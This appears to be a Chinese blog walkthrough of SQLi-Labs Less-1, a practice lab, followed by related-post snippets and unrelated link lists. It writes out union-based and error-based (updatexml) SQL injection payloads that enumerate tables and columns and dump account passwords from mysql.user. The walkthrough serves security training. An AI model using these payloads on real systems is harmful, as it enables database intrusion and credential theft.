SQLi Labs Less-1 联合注入+报错注入
第一关是单引号字符型注入,推荐使用联合注入、报错注入
方式一:联合注入
参考文章:联合注入使用详解,原理+步骤+实战案例
第一步、判断注入点
地址栏输入:?id=1' and 1 -- a,正常显示
地址栏输入:?id=1' and 0 -- a,异常(空)显示,确定注入点为:单引号字符型
第二步、判断字段数
地址栏依次输入:
?id=1' order by 1 -- a
?id=1' order by 2 -- a
?id=1' order by 3 -- a
?id=1' order by 4 -- a,开始报错,确定字段数为:3
第三步、判断显示位
地址栏输入:?id=0' union select 1,2,3 -- a
第四步、脱库
获取所有表:
?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 -- a
获取所有字段:
?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),3 -- a
获取账号密码:
?id=0' union select 1,(select group_concat(host,user,password) from mysql.user),3 -- a
方式二:报错注入
参考文章:报错注入使用详解,原理+步骤+实战教程
第一步、判断是否报错
地址栏输入:?id=1'
页面显示数据库的报错信息,适合使用报错注入。
第二步、验证报错函数
地址栏输入:?id=1' and updatexml(1,0x7e,3); -- a
页面正常报错,报错函数可以正常使用。
第三步、脱库
获取当前数据库:
?id=-1' and updatexml(1,concat('~',database()),3) -- a
获取所有表:
?id=-1' and updatexml(1,concat('~',substr((select group_concat(table_name)from information_schema.tables where table_schema=database()) , 1 , 31)
),3) -- a
获取账号密码:
?id=-1' and updatexml(1,concat('~',substr((select password from mysql.user where user='mituan') , 1 , 31)
),3) -- a
推荐专栏
《网络安全快速入门》 用最短的时间,掌握最核心的网络安全技术,持续更新……
《靶场通关教程》 各个靶场的通关教程,持续更新……
感谢你的点赞、收藏、评论,我是三日,祝你幸福!
SQLi Labs Less-1 联合注入+报错注入相关推荐
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
第26关是单引号字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- SQLi LABS Less 23 联合注入+报错注入+布尔盲注
第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...
- SQLi LABS Less-11 联合注入+报错注入
第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...
- SQLi LABS Less-12 联合注入+报错注入
第十二关是双引号+括号的字符型注入 , 推荐使用联合注入.报错注入. 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入:a") or 1 ...
- SQLi LABS Less-4 联合注入+报错注入
第四关是双引号+括号的字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 地址栏输入 ?id=1") and 1 ...
- SQLi LABS Less-3 联合注入+报错注入
第三关是单引号+括号的字符型注入 ,推荐使用联合注入.报错注入. 方式一:联合注入 推荐文章:联合注入使用详解,原理+步骤+实战教程 第一步.判断注入点类型 地址栏输入 ?id=1') and 1 - ...
最新文章
- 一个妹子图应用客户端源码
- Docker查看远端仓库的标签工具
- 【学习】Android开入门教程
- Queue 队列的用法
- 中文分词算法python_Python FMM算法的中文分词器实现方法源码
- Angular 下的 function
- SAP Spartacus Route Alias
- 让python脚本像普通程序一样运行
- [luoguP2324] [SCOI2005]骑士精神(A*?)
- [导入]基于D3D Effect的引擎模式探讨。
- PDF转图片的所有可行方法,全部都在这里了!
- 赛门铁克symantec 卸载需要密码解决方法
- 超平面(hyperplane)的定义
- IDEA,Pycharm等环境中复制代码到word去除黑色背景
- 【20CSPS提高组】函数调用
- UnityShader入门精要——运动模糊(2)
- Android异种机型系统适配:application定义的app名字和安装到手机后桌面显示app名字不一致
- ARM64+树莓派4b+JLINK仿真器实验环境搭建指南
- 安卓微信7.0版本的微信支付只支持拉起默认的微信,不支持应用双开的微信
- matlab计算涡度的函数_涡度的计算
热门文章
- 关于Keil4 转到 Keil5以后的一些错误解决
- JS模拟实现数组的map方法
- 微信小程序之旅一(注册页面的使用)
- 华为企业互动社区云计算板块
- 开源TinyXML 最简单的新手教程
- Lucene之样例解析(1)-配置Lucene的源代码
- Visual Stdio下安装WTL的向导Widzard
- 大数据之-Hadoop之HDFS_读数据流程_原理篇---大数据之hadoop工作笔记0069
- Sharding-Sphere,Sharding-JDBC_介绍_Sharding-Sphere,Sharding-JDBC分布式_分库分表工作笔记001
- DOTNET零碎总结---VB.NET修改数据存在多个txtbox时,SQL语句的操作